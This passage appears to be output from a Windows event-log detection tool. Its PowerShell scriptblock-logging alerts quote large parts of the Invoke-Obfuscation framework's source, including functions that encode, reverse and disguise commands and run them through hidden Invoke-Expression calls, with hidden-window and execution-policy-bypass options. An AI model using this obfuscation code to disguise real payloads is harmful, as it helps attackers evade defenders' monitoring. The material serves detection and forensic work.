'*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' 
'*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). 
$ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. $SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. 
.PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. 
$RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. 
Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. 
$DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) 